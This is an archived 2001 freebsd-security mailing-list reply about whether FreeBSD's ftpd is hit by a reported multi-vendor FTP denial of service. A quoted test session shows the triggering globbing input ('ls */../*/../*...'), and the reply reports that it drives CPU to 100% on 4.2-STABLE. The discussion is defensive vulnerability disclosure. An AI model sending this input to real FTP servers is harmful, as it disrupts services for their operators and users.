Date: Thu, 15 Mar 2001 19:59:58 -0300 From: Frederico A C Neves <fneves@registro.br> To: Fernando Schapachnik <fschapachnik@vianetworks.com.ar> Cc: Attila Nagy <bra@fsn.hu>, freebsd-security@FreeBSD.ORG Subject: Re: Multiple vendors FTP denial of service (fwd) Message-ID: <20010315195957.S78129@registro.br> In-Reply-To: <200103152250.TAA16613@ns1.via-net-works.net.ar>; from fpscha@ns1.via-net-works.net.ar on Thu, Mar 15, 2001 at 07:50:23PM -0300 References: <Pine.BSO.4.33.0103152116530.26292-100000@k2.jozsef.kando.hu> <200103152250.TAA16613@ns1.via-net-works.net.ar>
next in thread | previous in thread | raw e-mail | index | archive | help
I think so. With 4.2-STABLE in an anonymous session we got 100% CPU until we kill ftpd. On Thu, Mar 15, 2001 at 07:50:23PM -0300, Fernando Schapachnik wrote: > En un mensaje anterior, Attila Nagy escribió: > > > > FreeBSD isn't listed, but also vulnerable, at least with the FTPd in > > -STABLE. > > Sure? > > With 4.2-REL: > > Remote system type is UNIX. > Using binary mode to transfer files. > ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../* > 150 Opening ASCII mode data connection for '/bin/ls'. > 226 Transfer complete. > ftp> > ftp> ls > 150 Opening ASCII mode data connection for '/bin/ls'. > total 13 > -rw-r--r-- 1 fpscha wheel 628 27 dic 10:38 .cshrc > drwx------ 2 fpscha wheel 512 29 dic 13:17 .elm > -rw------- 1 fpscha wheel 1517 20 feb 09:28 .history > -rw-r--r-- 1 fpscha wheel 299 27 dic 10:38 .login > > [Everything normal, I mean] > > > Regards. > > Fernando P. Schapachnik > Administración de la red > VIA NET.WORKS ARGENTINA S.A. > fschapachnik@vianetworks.com.ar > Conmutador: (54-11) 4323-3333 - Soporte: 0810-333-AYUDA > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -- Frederico A C Neves Registro .br - R.Pio XI, 1500 +55 11 3838-4130 São Paulo, SP, Brazil - 05468-901 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?20010315195957.S78129>